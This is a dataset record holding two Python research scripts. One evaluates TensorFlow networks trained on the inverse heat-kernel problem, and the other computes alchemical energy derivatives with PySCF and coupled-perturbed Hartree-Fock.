hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
82fb589d4895880a1af9d3d8d7c3d8fbea1f8c46 | 25,629 | py | Python | heat_kernel_error_vs_time.py | domischi/inv-problem-solver-ml | 9f127544045d735e887c22fdf8d892b4370257b7 | [
"MIT"
] | null | null | null | heat_kernel_error_vs_time.py | domischi/inv-problem-solver-ml | 9f127544045d735e887c22fdf8d892b4370257b7 | [
"MIT"
] | null | null | null | heat_kernel_error_vs_time.py | domischi/inv-problem-solver-ml | 9f127544045d735e887c22fdf8d892b4370257b7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Tensorflow DNNRegressor in Python
# CC-BY-2.0 Paul Balzer
# see: http://www.cbcity.de/deep-learning-tensorflow-dnnregressor-einfach-erklaert
#
# this is next to impossible to set up nicely with argparse, so it is at least kept here at the top of the file
#list_of_hl=[
# [16, 16+16, 16+16],
# [16,16,16,16,16],
# [16+16, 16+16, 16],
# [16+16+16,16+16],
# [8,8],
# [256],
# [256,256],
# #[512],
# #[512,512]
# ]
# Import stuff
import argparse
from time import time
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import logging
import sys
import os
from glob import glob
# Output options
tf.logging.set_verbosity(tf.logging.WARN)
np.set_printoptions(precision=9)
logging.basicConfig(format='[%(asctime)s] %(message)s', level=logging.INFO)
logging.info('Tensorflow %s' % tf.__version__) # 1.4.1
# Construct parser
parser = argparse.ArgumentParser(description="A Python script that generates data for, and trains networks on, the (inverse) heat kernel problem")
parser.add_argument('--root-directory' , type=str , required=True , help ='Where all the data is getting stored')
parser.add_argument('--validation' , action='store_true' , help ='Should the model be validated?')
parser.add_argument('--training' , action='store_true' , help ='Should the model be trained?')
parser.add_argument('--learn-inverse' , action='store_true' , help ='Learn the inverse?')
parser.add_argument('--samples-per-file' , type=int , default=512 , help ='How many samples should be stored in the files')
parser.add_argument('--num-train-files' , type=int , default=256 , help ='How many training files should be generated?')
parser.add_argument('--num-eval-files' , type=int , default=32 , help ='How many evaluation files should be generated?')
parser.add_argument('--max-number-of-gaussians' , type=int , default=3 , help ='Number of Gaussians to be generated')
parser.add_argument('--gaussian-range' , type=float , default=1 , help ='The range for the centers of the gaussians is between +- this value')
parser.add_argument('--sigma-gaussian' , type=float , default=0.02 , help ='The width of the gaussians')
parser.add_argument('--simple-gaussians'                , action='store_true'                , help ='Only generate nice Gaussians to learn from: well separated and not too narrow')
parser.add_argument('--sampling-range'                  , type=float         , default=3     , help ='The sampling range is between +- this value')
parser.add_argument('--num-sampling-points'             , type=int           , default=512   , help ='How many sampling points should be given?')
parser.add_argument('--max-time-to-evolve' , type=float , default=0.01 , help ='What is the maximum time the network should revert?')
parser.add_argument('--min-time-to-evolve' , type=float , default=0.001 , help ='What is the minimum time the network should revert?')
parser.add_argument('--steps-per-epoch' , type=int , default=512 , help ='Steps per epoch')
parser.add_argument('--num-epochs' , type=int , default=200 , help ='Number of epochs')
parser.add_argument('--batch-size' , type=int , default=16384 , help ='Batch size')
parser.add_argument('--dropout' , type=float , default=0. , help ='Dropout (probably always stick to 0)')
parser.add_argument('--dont-delete-detailed-statistics' , action='store_true'                , help ='Keep the detailed statistics (by default they are deleted, as they bloat up the directories)')
parser.add_argument('--overwrite' , action='store_true' , help ='Overwrite the generated files')
OPTIONS=vars(parser.parse_args())
# Print options
for k in OPTIONS:
logging.info('\tOption {:<30}: {:>10}'.format(k, OPTIONS[k]))
# Set options
TRAINING = OPTIONS ['training']
VALIDATION = OPTIONS ['validation']
LEARN_INVERSE = OPTIONS ['learn_inverse']
DATA_ROOT_PATH = OPTIONS ['root_directory']
NUM_SAMPLES_PER_FILE = OPTIONS ['samples_per_file']
NUM_TRAIN_SAMPLES = OPTIONS ['num_train_files']
NUM_EVAL_SAMPLES = OPTIONS ['num_eval_files']
MAX_NUM_GAUSSIANS = OPTIONS ['max_number_of_gaussians']
GAUSSIAN_MIN = - OPTIONS ['gaussian_range']
GAUSSIAN_MAX = OPTIONS ['gaussian_range']
maxwidth = OPTIONS ['sigma_gaussian']
SAMPLING_MIN                  = - OPTIONS ['sampling_range']
SAMPLING_MAX                  =   OPTIONS ['sampling_range']
SAMPLING_N                    =   OPTIONS ['num_sampling_points']
MAX_TIME_TO_EVOLVE = OPTIONS ['max_time_to_evolve']
MIN_TIME_TO_EVOLVE = OPTIONS ['min_time_to_evolve']
STEPS_PER_EPOCH = OPTIONS ['steps_per_epoch']
EPOCHS = OPTIONS ['num_epochs']
BATCH_SIZE = OPTIONS ['batch_size']
dropout = OPTIONS ['dropout']
DELETE_DETAILED_STATISTICS = not OPTIONS ['dont_delete_detailed_statistics']
OVERWRITE = OPTIONS ['overwrite']
SIMPLE_GAUSSIANS = OPTIONS ['simple_gaussians']
# Precompute useful stuff and define the necessary evils
SAMPLING_SPACE=np.linspace(SAMPLING_MIN,SAMPLING_MAX,SAMPLING_N)
FEATURES=['X', 't']
LABEL=['y']
DATA_PREFIX='/data/'
DATA_SUFFIX='.tfrecord'
TRAIN_PREFIX='train'
EVAL_PREFIX='eval'
VALIDATE_PREFIX='validate'
ERROR_VS_TIME_PREFIX='error_vs_time'
def get_XY(SAMPLE_SIZE,LEARN_INVERSE=False):
X=[]
y=[]
t=[]
for i in range(SAMPLE_SIZE):
tmpt,tmpx,tmpy=get_one_XY()
t.append(tmpt)
X.append(tmpx)
y.append(tmpy)
t=np.array(t)
X=np.array(X)
y=np.array(y)
if LEARN_INVERSE:
return t,y,X
return t,X,y
# From https://gist.github.com/swyoon/8185b3dcf08ec728fb22b99016dd533f
def np_to_tfrecords(T, X, Y, file_path_prefix):
# Generate tfrecord writer
result_tf_file = file_path_prefix + DATA_SUFFIX
with tf.python_io.TFRecordWriter(result_tf_file) as writer:
# iterate over each sample,
# and serialize it as ProtoBuf.
for idx in range(X.shape[0]):
t = T[idx]
x = X[idx]
y = Y[idx]
d_feature = {}
d_feature['X'] = tf.train.Feature(float_list=tf.train.FloatList(value=x))
d_feature['y'] = tf.train.Feature(float_list=tf.train.FloatList(value=y))
d_feature['t'] = tf.train.Feature(float_list=tf.train.FloatList(value=[t]))
features = tf.train.Features(feature=d_feature)
example = tf.train.Example(features=features)
serialized = example.SerializeToString()
writer.write(serialized)
def write_tf_records(name, NUM_SAMPLES):
for i in range(NUM_SAMPLES):
t,X,y=get_XY(NUM_SAMPLES_PER_FILE)
#if LEARN_INVERSE:
# y,X=X,y
filename=DATA_ROOT_PATH+DATA_PREFIX+name+str(i)
np_to_tfrecords(t,X,y,filename)
def generate_data(name, NUM_SAMPLES, OVERWRITE=False):
filelist=glob(DATA_ROOT_PATH+DATA_PREFIX+str(name)+'*'+DATA_SUFFIX)
if len(filelist)<NUM_SAMPLES or OVERWRITE:
logging.info('Generate new '+str(name)+' data')
write_tf_records(name,NUM_SAMPLES)
logging.info('Generation of '+name+' data finished')
def dataset_input_fn(filenames,NUM_EPOCHS=1,NUM_BATCHES=32):
dataset = tf.data.TFRecordDataset(filenames)
# Use `tf.parse_single_example()` to extract data from a `tf.Example`
# protocol buffer, and perform any additional per-record preprocessing.
def parser(record):
keys_to_features = {
#'t': tf.FixedLenFeature((), tf.float32, default_value=tf.zeros([], dtype=tf.float32)),
't': tf.FixedLenSequenceFeature((), tf.float32, allow_missing=True ,default_value=tf.zeros([], dtype=tf.float32)),
'X': tf.FixedLenSequenceFeature((), tf.float32, allow_missing=True ,default_value=tf.zeros([], dtype=tf.float32)),
'y': tf.FixedLenSequenceFeature((), tf.float32, allow_missing=True ,default_value=tf.zeros([], dtype=tf.float32)),
}
parsed = tf.parse_single_example(record, keys_to_features)
#t=tf.cast(parsed['t'],tf.float32)
#X=tf.cast(parsed['X'],tf.float32)
#y=tf.cast(parsed['y'],tf.float32)
t=parsed['t']
X=parsed['X']
y=parsed['y']
return {"t": t, "X": X}, y
# Use `Dataset.map()` to build a pair of a feature dictionary and a label
# tensor for each example.
dataset = dataset.map(parser)
dataset = dataset.shuffle(buffer_size=10000)
dataset = dataset.batch(NUM_BATCHES)
dataset = dataset.repeat(NUM_EPOCHS)
iterator = dataset.make_one_shot_iterator()
# `features` is a dictionary in which each value is a batch of values for
# that feature; `labels` is a batch of labels.
features, labels = iterator.get_next()
return features, labels
def get_input_fn(filenames_start,NUM_EPOCHS=1,NUM_BATCHES=32):
lst=glob(DATA_ROOT_PATH+DATA_PREFIX+filenames_start+'*')
assert(len(lst)>0)
np.random.shuffle(lst)
lst=lst[0:4]
return lambda: dataset_input_fn(lst,NUM_EPOCHS,NUM_BATCHES)
def get_shapes(gt_XY, LEARN_INVERSE=False):
_, tmpx,tmpy=gt_XY(2,LEARN_INVERSE=LEARN_INVERSE)
if len(tmpx.shape)==1: # 1D input data
INPUT_SHAPE=(1,)
elif len(tmpx.shape)==2: # vector input data
INPUT_SHAPE=(tmpx.shape[-1],)
else:
        logging.error('Trying to input matrix (or higher-rank tensor) data, not yet implemented')
sys.exit()
if len(tmpy.shape)==1: # 1D input data
OUTPUT_SHAPE=1
elif len(tmpy.shape)==2: # vector input data
OUTPUT_SHAPE=tmpy.shape[-1]
else:
        logging.error('Trying to learn matrix (or higher-rank tensor) data, not yet implemented')
sys.exit()
return INPUT_SHAPE,OUTPUT_SHAPE
def model_name(parm):
s=''
#s+=parm['optimizer']+'_'
s+=parm['activation']+'_K'
#s+=str(parm['conv_also_activate'])+'_'
s+=str( parm['kernel_size'] )+'_t'
hl_list=parm['hidden_units_t']
for hl in hl_list:
s += '{}{}'.format(hl[0][0], hl[1])
s+="_X"
hl_list=parm['hidden_units_X']
for hl in hl_list:
s += '{}{}'.format(hl[0][0], hl[1])
s+="_"
hl_list=parm['hidden_units_combined']
for hl in hl_list:
s += '{}{}'.format(hl[0][0], hl[1])
return s
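# Example of the generated name (values below are illustrative, not defaults):
# activation 'elu', kernel_size 3, hidden_units_t [['dense', 128]],
# hidden_units_X [['conv', 16]] and hidden_units_combined [['dense', 256]]
# yield the name 'elu_K3_td128_Xc16_d256'.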
def read_tffile(PATH):
record_iterator = tf.python_io.tf_record_iterator(path=PATH)
X=[]
Y=[]
T=[]
for string_record in record_iterator:
example = tf.train.Example()
example.ParseFromString(string_record)
X.append(np.array( example.features.feature['X'].float_list.value ))
Y.append(np.array( example.features.feature['y'].float_list.value ))
T.append(np.array( example.features.feature['t'].float_list.value ))
T=np.array(T)
X=np.array(X)
Y=np.array(Y)
return T,X,Y
def one_gaussian(mean, sigma):
return np.exp(-(SAMPLING_SPACE-mean)**2/(2*sigma))/np.sqrt(2*np.pi*sigma)
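# NOTE: in one_gaussian, `sigma` enters the exponent and the normalization as
# the variance (the sigma^2 of the usual normal density), not as the standard
# deviation.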
def one_random_gaussian(a,b):
mean=np.random.rand()*(b-a)+a
sigma=maxwidth*np.random.rand()*(b-a)
return one_gaussian(mean,sigma)
def n_random_gaussians(a,b,n):
y=np.zeros(len(SAMPLING_SPACE))
for i in range(n):
y+=one_random_gaussian(a,b)
return y/n
def n_random_gaussians_simplified(a,b,n):
y=np.zeros(len(SAMPLING_SPACE))
means=None
while True:
means=np.sort( np.random.rand(np.random.randint(n)+1)*(b-a)+a )
if len(means)== 1 or min(abs( means[1:]-means[:-1] ))> (b-a)/(2*len(means)):
break
minwidth=maxwidth/3
sigmas=(maxwidth-minwidth)*np.random.rand(len(means))+minwidth
for m,s in zip(means,sigmas):
y+=one_gaussian(m,s)
return y/n
def random_gaussians(a,b):
    n=np.random.randint(MAX_NUM_GAUSSIANS)+1
return n_random_gaussians(a,b,n)
def get_heat_kernel(t):
return np.exp(-SAMPLING_SPACE**2/(4*t))/np.sqrt(4*np.pi*t)
def apply_heat_kernel(input_configuration, t):
    return np.convolve(input_configuration,get_heat_kernel(t), 'same')*(SAMPLING_MAX-SAMPLING_MIN)/SAMPLING_N
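# The convolution above approximates the continuous heat propagator; the
# trailing factor (SAMPLING_MAX-SAMPLING_MIN)/SAMPLING_N is the grid spacing
# dx, which turns the discrete sum into an approximation of the integral.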
# get_one_XY returns X, y, each a numpy array of the right dimension, without further preprocessing (that is done in get_XY)
def get_one_XY():
TIME_TO_EVOLVE=np.random.rand()*(MAX_TIME_TO_EVOLVE-MIN_TIME_TO_EVOLVE)+MIN_TIME_TO_EVOLVE
if SIMPLE_GAUSSIANS:
X=n_random_gaussians_simplified(GAUSSIAN_MIN,GAUSSIAN_MAX,MAX_NUM_GAUSSIANS)
else:
X=n_random_gaussians(GAUSSIAN_MIN,GAUSSIAN_MAX,MAX_NUM_GAUSSIANS)
y=apply_heat_kernel(X,TIME_TO_EVOLVE)
return TIME_TO_EVOLVE,X,y
os.makedirs(DATA_ROOT_PATH+DATA_PREFIX, exist_ok=True)
#generate_data(TRAIN_PREFIX , NUM_TRAIN_SAMPLES, OVERWRITE=OVERWRITE )
#generate_data(EVAL_PREFIX , NUM_EVAL_SAMPLES , OVERWRITE=OVERWRITE )
#generate_data(VALIDATE_PREFIX , 1 , OVERWRITE=OVERWRITE )
def prod(iterable):
s=1
for i in iterable:
s*=i
return s
def mixed_model(features, labels, mode, params):
"""Create a network for the inverse heat kernel problem
params: dictionary of the relevant values
params['hidden_units']: list of (description_string, num_neurons)
where description_string can be 'dense' or 'conv'
params['activation']: 'relu','leaky_relu', 'elu', 'relu6', 'selu'
params['conv_also_activate']: boolean
params['optimizer']: 'adam', 'adagrad', 'adadelta', 'rmsprop', 'ftrl'
"""
ACTIVATION_FN=None
if 'activation' not in params.keys():
        logging.error('Did not supply an activation parameter, aborting...')
sys.exit()
if 'optimizer' not in params.keys():
logging.error('Did not supply an optimizer parameter, aborting...')
sys.exit()
if 'conv_also_activate' not in params.keys():
logging.error('Did not supply a conv_also_activate parameter, aborting...')
sys.exit()
if params['activation']== 'relu':
ACTIVATION_FN=tf.nn.relu
elif params['activation']== 'leaky_relu' :
ACTIVATION_FN=tf.nn.leaky_relu
elif params['activation']== 'elu' :
ACTIVATION_FN=tf.nn.elu
elif params['activation']== 'relu6' :
ACTIVATION_FN=tf.nn.relu6
elif params['activation']== 'selu' :
ACTIVATION_FN=tf.nn.selu
else:
logging.error('Unrecognized activation function {}, aborting'.format(params['activation']))
sys.exit()
X_net=tf.feature_column.input_layer(features, [q for q in params['feature_columns'] if q.key=='X'] )
t_net=tf.feature_column.input_layer(features, [q for q in params['feature_columns'] if q.key=='t'] )
for units in params['hidden_units_t']:
if units[0]=='dense':
t_net = tf.layers.dense(t_net, units=units[1], activation=ACTIVATION_FN)
else:
logging.error('Unrecognized layer type {}, aborting'.format(units[0]))
sys.exit()
for units in params['hidden_units_X']:
if units[0]=='dense':
X_net = tf.layers.dense(X_net, units=units[1], activation=ACTIVATION_FN)
elif units[0]=='conv':
if len(X_net.get_shape().as_list())==2:
X_net=tf.expand_dims(X_net, axis=-1)
if params['conv_also_activate']:
X_net = tf.layers.conv1d(X_net, filters=units[1], kernel_size=params['kernel_size'], activation=ACTIVATION_FN)
else:
X_net = tf.layers.conv1d(X_net, filters=units[1], kernel_size=params['kernel_size'], activation=None)
else:
logging.error('Unrecognized layer type {}, aborting'.format(units[0]))
sys.exit()
X_net=tf.reshape(X_net,[-1,prod(X_net.get_shape().as_list()[1:])])
net= tf.concat([t_net, X_net], -1)
for units in params['hidden_units_combined']:
if units[0]=='dense':
net = tf.layers.dense(net, units=units[1], activation=ACTIVATION_FN)
else:
logging.error('Unrecognized layer type {}, aborting'.format(units[0]))
sys.exit()
    net = tf.layers.dense(net, units=SAMPLING_N, activation=None)
# Compute predictions.
if mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
'predictions': net,
}
return tf.estimator.EstimatorSpec(mode, predictions=predictions)
# Compute loss.
loss = tf.losses.mean_squared_error(labels=labels, predictions=net)
if mode == tf.estimator.ModeKeys.EVAL:
return tf.estimator.EstimatorSpec(mode, loss=loss)
# Create training op.
assert mode == tf.estimator.ModeKeys.TRAIN
optimizer=None
if params['optimizer']=='adam':
optimizer = tf.train.AdamOptimizer()
elif params['optimizer']== 'adagrad':
optimizer = tf.train.AdagradOptimizer(learning_rate=0.01)
elif params['optimizer']== 'adadelta':
optimizer = tf.train.AdadeltaOptimizer()
elif params['optimizer']== 'rmsprop':
optimizer = tf.train.RMSPropOptimizer(learning_rate=0.001)
    elif params['optimizer']== 'ftrl':
        optimizer = tf.train.FtrlOptimizer(0.05)
    else:
        logging.error('Unrecognized optimizer {}, aborting'.format(params['optimizer']))
        sys.exit()
train_op = optimizer.minimize(loss, global_step=tf.train.get_global_step())
return tf.estimator.EstimatorSpec(mode, loss=loss, train_op=train_op)
INPUT_SHAPE,OUTPUT_SHAPE=get_shapes(get_XY, LEARN_INVERSE=LEARN_INVERSE)
# --------------
feature_columns = [
tf.feature_column.numeric_column('t', shape=(1,)),
tf.feature_column.numeric_column('X', shape=INPUT_SHAPE)
]
activation_list=['leaky_relu','elu']
layer_type_list=['conv','dense']
layer_width_list_t=[2**i for i in range(4,9)]
layer_width_list_X=[16,32]
layer_width_list_combined=[128,256]
def random_choice(iterable):
return iterable[np.random.randint(len(iterable))]
def monte_carlo_the_model():
params={ 'feature_columns': feature_columns }
params['optimizer']='rmsprop'
params['activation']=random_choice(activation_list)
params['conv_also_activate']=True
#params['conv_also_activate']=bool(np.random.randint(2))
params['hidden_units_t']=[]
params['hidden_units_X']=[]
params['hidden_units_combined']=[]
params['kernel_size']=np.random.randint(5)+1
for i in range( np.random.randint(2) +1):
tmp=['dense', random_choice(layer_width_list_t)]
params['hidden_units_t'].append(tmp)
for i in range( np.random.randint(2) ):
tmp=['conv', random_choice(layer_width_list_X)]
params['hidden_units_X'].append(tmp)
for i in range( 1 ):
tmp=['dense', random_choice(layer_width_list_combined)]
params['hidden_units_combined'].append(tmp)
return params
def get_one_X():
if SIMPLE_GAUSSIANS:
X=n_random_gaussians_simplified(GAUSSIAN_MIN,GAUSSIAN_MAX,MAX_NUM_GAUSSIANS)
else:
X=n_random_gaussians(GAUSSIAN_MIN,GAUSSIAN_MAX,MAX_NUM_GAUSSIANS)
return X
def get_one_XY_fixed_t(TIME_TO_EVOLVE):
if SIMPLE_GAUSSIANS:
X=n_random_gaussians_simplified(GAUSSIAN_MIN,GAUSSIAN_MAX,MAX_NUM_GAUSSIANS)
else:
X=n_random_gaussians(GAUSSIAN_MIN,GAUSSIAN_MAX,MAX_NUM_GAUSSIANS)
y=apply_heat_kernel(X,TIME_TO_EVOLVE)
return TIME_TO_EVOLVE,X,y
def get_XY_fixed_t(NUM_SAMPLES_PER_FILE, fixed_t=None):
    if fixed_t is None:
return get_XY(NUM_SAMPLES_PER_FILE)
else:
X=[]
y=[]
t=[]
for i in range(NUM_SAMPLES_PER_FILE):
tmpx=get_one_X()
for T in np.linspace(MIN_TIME_TO_EVOLVE, MAX_TIME_TO_EVOLVE, fixed_t):
tmpy=apply_heat_kernel(tmpx,T)
t.append(T)
X.append(tmpx)
y.append(tmpy)
t=np.array(t)
X=np.array(X)
y=np.array(y)
if LEARN_INVERSE:
return t,y,X
return t,X,y
def generate_error_data(name, NUM_SAMPLES, NUM_TIMES, OVERWRITE=False):
filelist=glob(DATA_ROOT_PATH+DATA_PREFIX+str(name)+'*'+DATA_SUFFIX)
if len(filelist)<NUM_SAMPLES or OVERWRITE:
logging.info('Generate new '+str(name)+' data')
t,X,y=get_XY_fixed_t(NUM_SAMPLES, NUM_TIMES)
if LEARN_INVERSE:
y,X=X,y
filename=DATA_ROOT_PATH+DATA_PREFIX+name+str(0)
np_to_tfrecords(t,X,y,filename)
logging.info('Generation of '+name+' data finished')
already_done=[]
counter=0
PLOT_ALL=False
NUM_TIMES=20
NUM_SAMPLES_FOR_ERR_VS_TIME=128
generate_error_data(ERROR_VS_TIME_PREFIX,NUM_SAMPLES_FOR_ERR_VS_TIME,NUM_TIMES,OVERWRITE=True)
while True:
parm=monte_carlo_the_model()
MODEL_PATH=DATA_ROOT_PATH+'/models/'
MODEL_PATH += model_name(parm)
if not os.path.exists(MODEL_PATH):
continue
logging.info('Loading %s' % MODEL_PATH)
if MODEL_PATH in already_done:
counter+=1
if counter == 20:
            logging.info('Did not find any new models, aborting...')
break
continue
counter=0
already_done.append(MODEL_PATH)
# Validation and Test Configuration
test_config = tf.estimator.RunConfig(save_checkpoints_steps=None,
save_checkpoints_secs=600,
keep_checkpoint_max=1,
model_dir=MODEL_PATH)
# Building the Network
regressor = tf.estimator.Estimator(
model_fn=mixed_model,
config=test_config,
params=parm
)
plt.ioff()
logging.info('Only do the validation')
VALIDATION_PATH=DATA_ROOT_PATH+'/validation/'+model_name(parm)+'/'
#T,X,Y=read_tffile(glob( DATA_ROOT_PATH+'/data/'+ERROR_VS_TIME_PREFIX+'*' )[0])
T,Y,X=read_tffile(glob( DATA_ROOT_PATH+'/data/'+ERROR_VS_TIME_PREFIX+'*' )[0])
y_dnn=regressor.predict(input_fn=lambda :{'X': tf.convert_to_tensor(X, name='X'), 't': tf.convert_to_tensor(T, name = 't')})
logging.info('\tStart validation for '+model_name(parm))
L2_t0=dict()
L2_t1=dict()
for i,y in enumerate(y_dnn):
if i >= len(X) or i >=NUM_TIMES*NUM_SAMPLES_FOR_ERR_VS_TIME:
break
if LEARN_INVERSE:
y_pred_for_plot=np.array(y['predictions'])
tim = T[i][0]
if PLOT_ALL:
fig, (ax1,ax2,ax3)=plt.subplots(3,1,figsize=(10,6), sharex=True)
plt.sca(ax1)
            plt.title('t={:.5f}'.format(float(0)))
plt.plot(SAMPLING_SPACE , Y[i] , label='Real')
plt.plot(SAMPLING_SPACE , y_pred_for_plot , label='Network')
plt.ylabel('Heat profile')
plt.legend(loc='best')
plt.sca(ax2)
            plt.title('t={:.5f}'.format(float(tim)))
plt.plot(SAMPLING_SPACE , X[i] , label='Real' )
plt.plot(SAMPLING_SPACE , apply_heat_kernel( y_pred_for_plot, tim ) , label='Network')
plt.ylabel('Heat profile')
plt.legend(loc='best')
plt.sca(ax3)
plt.plot(SAMPLING_SPACE , y_pred_for_plot-Y[i] , label=r'$\Delta(t=0)$')
plt.plot(SAMPLING_SPACE , apply_heat_kernel( y_pred_for_plot, tim )-X[i] , label=r'$\Delta(t=$'+str(tim)+'$)$')
plt.ylabel('Difference')
plt.legend(loc='best')
plt.show(block=True)
os.makedirs(VALIDATION_PATH, exist_ok=True)
if LEARN_INVERSE:
assert(max(X[i])<max(Y[i]))
e_t0=np.linalg.norm(y_pred_for_plot-Y[i]) /len(Y[i])
e_t1=np.linalg.norm(apply_heat_kernel( y_pred_for_plot, tim )-X[i])/len(X[i])
#e_t1=np.linalg.norm(y_pred_for_plot-Y[i]) /len(Y[i])
#e_t0=np.linalg.norm(apply_heat_kernel( y_pred_for_plot, tim )-X[i])/len(X[i])
if tim in L2_t0.keys():
L2_t0[tim].append(e_t0)
L2_t1[tim].append(e_t1)
else:
L2_t0[tim]=[e_t0]
L2_t1[tim]=[e_t1]
else:
            assert False, 'this analysis is only implemented for --learn-inverse'
del y_dnn
Ts=np.array(sorted( L2_t0.keys() ))
    logging.debug('number of error samples per time bin: %d', len(L2_t1[Ts[0]]))
L2_t0_mean=[np.mean(L2_t0[t]) for t in Ts]
L2_t0_err =[np.std(L2_t0[t]) for t in Ts]
L2_t1_mean=[np.mean(L2_t1[t]) for t in Ts]
L2_t1_err =[np.std(L2_t1[t]) for t in Ts]
eps=4e-5
    plt.errorbar(Ts+eps, L2_t0_mean, yerr=L2_t0_err, label='Reconstructed')
    plt.errorbar(Ts-eps, L2_t1_mean, yerr=L2_t1_err, label='Forwarded')
plt.legend(loc='best')
logging.info('\tEnded validation for '+model_name(parm))
plt.show(block=True)
sys.exit()
| 43.660988 | 191 | 0.63077 |
7993f39f4f9f6cd0e9a356658216426c84ed0e0b | 4,867 | py | Python | Alchemical_CPHF_perturbator/alch_deriv.py | giorgiodomen/Supplementary_code_for_Quantum_Alchemy | 2db1c1386f1a408cae05b7cbe21e2dab5159c181 | [
"MIT"
] | 1 | 2020-07-27T07:06:22.000Z | 2020-07-27T07:06:22.000Z | Alchemical_CPHF_perturbator/alch_deriv.py | giorgiodomen/Supplementary_code_for_Quantum_Alchemy | 2db1c1386f1a408cae05b7cbe21e2dab5159c181 | [
"MIT"
] | null | null | null | Alchemical_CPHF_perturbator/alch_deriv.py | giorgiodomen/Supplementary_code_for_Quantum_Alchemy | 2db1c1386f1a408cae05b7cbe21e2dab5159c181 | [
"MIT"
] | null | null | null | import pyscf.qmmm
from pyscf import gto, scf
import numpy as np
import pyscf.qmmm
from pyscf import gto, scf
import numpy as np
from pyscf import lib
from functools import reduce
from pyscf.scf import cphf
from pyscf import lib
from pyscf.prop.nmr import rhf as rhf_nmr
from AP_utils import alias_param,parse_charge,DeltaV
def alchemy_cphf_deriv(mf,int_r, with_cphf=True):
polobj=mf.Polarizability()
mol = mf.mol
mo_energy = mf.mo_energy
mo_coeff = mf.mo_coeff
mo_occ = mf.mo_occ
occidx = mo_occ > 0
orbo = mo_coeff[:, occidx]
orbv = mo_coeff[:,~occidx]
charges = mol.atom_charges()
coords = mol.atom_coords()
charge_center = np.einsum('i,ix->x', charges, coords) / charges.sum()
h1 = lib.einsum('pq,pi,qj->ij', int_r, mo_coeff.conj(), orbo) #going to molecular orbitals
h1=h1.reshape((1,h1.shape[0],h1.shape[1]))
s1 = np.zeros_like(h1)
vind = polobj.gen_vind(mf, mo_coeff, mo_occ)
if with_cphf:
mo1,e1 = cphf.solve(vind, mo_energy, mo_occ, h1, s1, polobj.max_cycle_cphf, polobj.conv_tol)
else:
        # the uncoupled solver is assumed to also return the orbital-energy
        # response as its second value; otherwise e1 in the return below
        # would be undefined
        mo1, e1 = rhf_nmr._solve_mo1_uncoupled(mo_energy, mo_occ, h1, s1)
return mo1[0],e1[0]
def first_deriv_nuc_nuc(mol,dL):
"""dL=[[i1,i2,i3],[c1,c2,c3]]"""
dnn=0
for j in range(len(dL[0])):
r2 = mol.atom_coord(dL[0][j])
for i in range(mol.natm):
if i != dL[0][j]:
q1 = mol.atom_charge(i)
r1 = mol.atom_coord(i)
r = np.linalg.norm(r1-r2)
dnn += (q1 * dL[1][j])/ r
return dnn
def second_deriv_nuc_nuc(mol,dL):
"""dL=[[i1,i2,i3],[c1,c2,c3]]"""
dnn=0
for j in range(len(dL[0])):
r2 = mol.atom_coord(dL[0][j])
for i in range(len(dL[0])):
if dL[0][i] > dL[0][j]:
r1 = mol.atom_coord(dL[0][i])
r = np.linalg.norm(r1-r2)
dnn += (dL[1][i] * dL[1][j])/ r
return 2*dnn
def first_deriv_elec(mf,int_r):
P=mf.make_rdm1()
return np.einsum('ij,ji',P,int_r)
def second_deriv_elec(mf,int_r,mo1):
orbo = mf.mo_coeff[:, :mo1.shape[1]]
h1 = lib.einsum('pq,pi,qj->ij', int_r, mf.mo_coeff.conj(), orbo)
e2 = np.einsum('pi,pi', h1, mo1)
e2 *= 4
return e2
def third_deriv_elec(mf,int_r,mo1,e1): #only for one site (d^3 E /dZ^3)
mo_coeff = mf.mo_coeff
mo_occ = mf.mo_occ
occidx = mo_occ > 0
orbo = mo_coeff[:, occidx]
mo1 = lib.einsum('qi,pq->pi', mo1, mo_coeff)
dm1 = lib.einsum('pi,qi->pq', mo1, orbo) * 2
dm1 = dm1 + dm1.transpose(1,0)
vresp = mf.gen_response(hermi=1) # (J-K/2)(dm)
h1ao = int_r + vresp(dm1)#Fock matrix
e3 = lib.einsum('pq,pi,qi', h1ao, mo1, mo1) * 2 # *2 for double occupancy
e3 -= lib.einsum('pq,pi,qj,ij', mf.get_ovlp(), mo1, mo1, e1) * 2
e3 *=6
return e3
def alch_deriv(mf,dL=[]):
""" alch_deriv(mf,dL=[]) returns U,dP for a dl=.001 times the charges
dL can be the whole list of nuclear charges placed on atom, with length equals to mol.natm (eg.[0,1,0,0,-1,...,0])
or alternatively a list with two sublist of equal length in the form [[atm_idxs],[atm_charges]]
"""
mol=mf.mol
dL=parse_charge(dL)
int_r=DeltaV(mol,dL)
mo1,e1=alchemy_cphf_deriv(mf,int_r)
der1=first_deriv_elec(mf,int_r)+first_deriv_nuc_nuc(mol,dL)
der2=second_deriv_elec(mf,int_r,mo1)+second_deriv_nuc_nuc(mol,dL)
der3=third_deriv_elec(mf,int_r,mo1,e1)
return (der1,der2,der3)
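# Illustrative usage (a sketch; the molecule, basis and dL values below are
# assumptions for demonstration, not taken from this module):
#     mol = gto.M(atom='C 0 0 0; O 0 0 1.13', basis='sto-3g')
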